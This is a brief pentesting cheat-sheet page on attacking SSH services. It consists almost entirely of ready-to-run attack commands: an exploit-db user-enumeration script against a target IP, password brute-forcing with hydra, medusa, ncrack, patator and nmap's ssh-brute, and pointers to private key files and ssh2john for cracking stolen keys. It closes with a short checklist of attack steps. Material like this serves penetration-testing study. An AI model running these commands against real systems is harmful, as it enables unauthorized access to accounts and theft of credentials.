Comment on page
SSH
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
nmap -sV -p T:22 $ip
7.2p1
ssh <user name>@$ip
ssh –i key <user name>@$ip
patator ssh_login host=$ip user=FILE0 0=user.txt password=FILE1 1=pass.txt
Known username
hydra -v -V -l root -P pass.txt $ip ssh
Username and password attack
hydra -L user.txt -P pass.txt $ip ssh
medusa -h $ip -U user.txt -P pass.txt -M ssh
ncrack –v –U user.txt –P pass.txt $ip:22
nmap -p 22 –script ssh-brute –script-args userdb=users.lst,passdb=pass.lst –script-args ssh-brute.timeout=4s $ip
$user/.ssh/id_rsa
$user/.ssh/authorized key
/usr/share/john/ssh2john.py
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts
- Gather version numbers
- Searchsploit
- Default Creds
- Creds previously gathered
- Download the software
Last modified 3yr ago